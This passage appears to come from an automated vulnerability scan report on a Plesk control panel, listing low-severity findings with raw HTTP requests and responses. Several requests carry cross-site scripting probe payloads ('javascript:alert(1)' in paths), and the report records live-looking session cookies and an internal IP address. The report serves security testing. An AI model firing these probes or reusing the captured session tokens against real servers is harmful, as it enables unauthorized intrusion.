9.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/

Issue detail

The following email address was disclosed in the response:

Request

GET /plesk/reseller@3/report/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 14:16:27 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: reseller_report__report_id=2
Set-Cookie: psaContext=home; path=/
Date: Sat, 24 Sep 2011 14:16:27 GMT
Server: sw-cp-server
Content-Length: 15752

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="23c
...[SNIP]...
<input type="text" name="email" value="xss@xss.cx" size="25" maxlength="255">
...[SNIP]...
<td>xss@xss.cx</td>
...[SNIP]...

9.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/my-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/my-profile

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/my-profile HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 12:14:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 12:14:22 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 12:14:23 GMT
Server: sw-cp-server
Content-Length: 40703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="xss@xss.cx" class="f-middle-size input-text" disabled="1" />
...[SNIP]...

10. Private IP addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


10.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/create

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /admin/customer/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:57:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:57:58 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 18:57:58 GMT
Server: sw-cp-server
Content-Length: 46021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<option value="1" label="10.60.240.130 (dedicated)">10.60.240.130 (dedicated)</option>
...[SNIP]...

10.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home/admin

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /admin/home/admin HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: Keep-Alive
Cookie: locale=en-US; PHPSESSID=539f3ab261e99e4b19efbd260df0b45d; psaContext=dashboard; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:54:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:54:30 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=home; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 18:54:31 GMT
Server: sw-cp-server
Content-Length: 16193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<td class="">10.60.240.130</td>
...[SNIP]...

10.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/account/create-subscription

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /smb/account/create-subscription?redirectUrl=%2F HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:57:38 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:57:39 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:57:39 GMT
Server: sw-cp-server
Content-Length: 15323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<option value="1" label="10.60.240.130 (dedicated)">10.60.240.130 (dedicated)</option>
...[SNIP]...

11. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


11.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:22:49 GMT
Cache-Control: max-age=2592000
Content-Type: application/octet-stream
ETag: "-2882378012694538420"
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 11:23:31 GMT
Content-Length: 40070
Date: Fri, 23 Sep 2011 18:22:49 GMT
Server: sw-cp-server

......00.............. ..........n...........................h.......00..........F$.. ...........@..........H....M..........h....T..00.... ..%..FX.. .... ......}........ ..    ............ .h.......(.
...[SNIP]...

11.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/chk.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/chk.js.php

Request

GET /javascript/chk.js.php HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Fri, 23 Sep 2011 18:24:07 GMT
Server: sw-cp-server
Content-Length: 8419

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z-_.\/]+$/;
   // forbid /../ and // and ^./ and ^../ and /./ and /
...[SNIP]...

12. HTML does not specify charset  previous  next
There are 269 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


12.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /

Request

GET / HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:22:46 GMT
Expires: Fri, 28 May 1999 00:00:00 GMT
Cache-Control: max-age=2592000
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:22:46 GMT
Pragma: no-cache
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-type: text/html
Date: Fri, 23 Sep 2011 18:22:46 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/%EF%BF%BDjavascript:alert(1)/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /%EF%BF%BDjavascript:alert(1)/

Request

GET /%EF%BF%BDjavascript:alert(1)/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; psaContext=dashboard; PHPSESSID=164c754f4a2f940a7c550d49107dfe3e; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:58:07 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/%EF%BF%BDjavascript:alert(1)//  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /%EF%BF%BDjavascript:alert(1)//

Request

GET /%EF%BF%BDjavascript:alert(1)// HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; psaContext=dashboard; PHPSESSID=164c754f4a2f940a7c550d49107dfe3e; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:58:07 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/%EF%BF%BDjavascript:alert(1)//c4640c8d  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /%EF%BF%BDjavascript:alert(1)//c4640c8d

Request

GET /%EF%BF%BDjavascript:alert(1)//c4640c8d HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/?start_page=%00javascript%3aalert(1)//c4640c8d
Cookie: locale=en-US; PHPSESSID=164c754f4a2f940a7c550d49107dfe3e; psaContext=dashboard; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:58:07 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /account/

Request

GET /account/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/account/power-mode-logout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /account/power-mode-logout

Request

GET /account/power-mode-logout HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:58 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin-home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin-home/

Request

GET /admin-home/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
